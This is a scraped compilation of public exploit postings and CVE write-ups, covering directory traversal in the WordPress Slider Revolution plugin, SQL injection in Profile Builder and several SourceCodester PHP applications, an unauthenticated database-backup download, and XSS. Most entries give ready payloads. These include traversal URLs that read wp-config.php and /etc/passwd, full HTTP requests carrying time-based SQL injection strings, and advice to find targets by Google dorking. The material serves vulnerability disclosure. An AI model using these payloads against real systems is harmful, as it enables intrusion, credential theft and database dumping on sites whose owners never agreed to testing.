WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Profile Builder 3.0.5 SQL Injection

Global Education and Technoworld version 4.1 suffers from an unauthorized backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : GLOBAL EDUCATION & TECHNOWORLD Version 4.1 unauthorized backup download Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.10(Pro) / browser : Mozilla firefox 108.0.2(32-bit)                                          | | # Vendor    : https://globaledune.com/                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The security vulnerability allows you to download a copy of the site's database, and of course it contains all tables, especially the admin column.[+] Use payload : /ims_panel/backup.php or /new/backup.php or /soft/backup.php[+] https://127.0.0.1/isoftcomputerin/ims_panel/backup.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Global Education And Technoworld 4.1 Backup Disclosure

A vulnerability classified as critical has been found in SourceCodester Online Flight Booking Management System. This affects an unknown part of the file review_search.php of the component POST Parameter Handler. The manipulation of the argument txtsearch leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218277 was assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

**Online Flight Booking Management System review\_search.php has SQLinject.md**

Download the source code from

https://www.sourcecodester.com/php/15865/online-flight-booking-management-system-using-php-and-mysql-free-source-code.html

line: 9

The POST parameter txtsearch is received and assigned to $txtsearch

line: 172-186

     <?php   
              $event_query = $conn->query("select * from sub_event where event_name like '%$txtsearch%'") or die(mysql_error());
    	 
               
         
         $menum_row = $event_query->rowcount();
            if( $menum_row > 0){ ?>
            <h3>Sub Events</h3>
            
            <?php 
            while ($event_row = $event_query->fetch()) 
            { 
                 $search_mainevent_id=$event_row['mainevent_id'];
                 $search_subevent_id=$event_row['subevent_id'];
                ?>
    

Because the string entered by the user is not filtered and the sql statements are spliced, the sql injection vulnerability is generated. It can cause serious harm to the system.

Use burpsuite for vulnerability verification:

Use sqlmap for vulnerability verification:

CVE-2023-0283: cve-list/Online Flight Booking Management System review_search.md at master · qyhmsys/cve-list

A vulnerability was found in SourceCodester Online Flight Booking Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file judge_panel.php. The manipulation of the argument subevent_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218276.

CVE-2023-0281

Online Student Enrollment System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /student_enrollment/admin/login.php.

**Online Student Enrollment System v1.0 by donbermoy has SQL injection**

BUG\_Author:XueYing Li

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/login.php

Parameter "username" (POST), exists SQL injection vulnerability

Payload1:username=1%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27&password=2&login=
    

An error page

Payload2:username=1%27%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 34
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27%27&password=2&login=
    

An right page

Payload3:username=a'%2b(select\*from(select(sleep(20)))a)%2b'&password=b&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=argh74f67q09vjd4k7088q9sji
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/student_enrollment/admin/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 69
    
    username=a'%2b(select*from(select(sleep(20)))a)%2b'&password=b&login=
    

sleep(20) The server response time is 20 seconds

CVE-2022-46502: bug_report/SQLi-1.md at main · snowingllll/bug_report

Online Health Care System v1.0 was discovered to contain a SQL injection vulnerability via the consulting_id parameter at /healthcare/Admin/consulting_detail.php.

Permalink

**Online Health Care System v1.0 by janobe has SQL injection**

BUG\_Author: Peisen Wang

vendors:https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html

Vulnerability File: /healthcare/Admin/consulting\_detail.php

Parameter "consulting\_id" (GET), exists delayed injection vulnerability

Payload1: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(10)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(10)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(10)), The server response time is 10 seconds

Payload2: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(20)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(20)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(20)), The server response time is 20 seconds

CVE-2022-46471: bug_report/SQLi-1.md at main · dreamwonly/bug_report

A cross-site scripting (XSS) vulnerability in the /admin/article_category.php component of DouPHP v1.7 20221118 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the description parameter.

CVE-2022-46438

A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Student Study Center

\> Management System V 1.0 allows attackers to execute arbitrary web

\> scripts or HTML via a crafted payload injected into the name parameter.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://phpgurukul.com/

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Student Study Center Management System - V 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> fromdate

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> Steps-To-Reproduce:

\> Step 1 Go to the Product admin panel https://localhost/php-jms/index.php

\> Step 2 " Enter default credentials in username and password

\> Step 3 " After login see Report option and click on report option

\> Step 4 " fill date in From Date and To date input area.

\> Step 5 " Click submit button and capture reauest

\> Step 6 - put XSS payload in From Date input field with date

\> Step 7 - payload execute.

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-47102

Tag

#php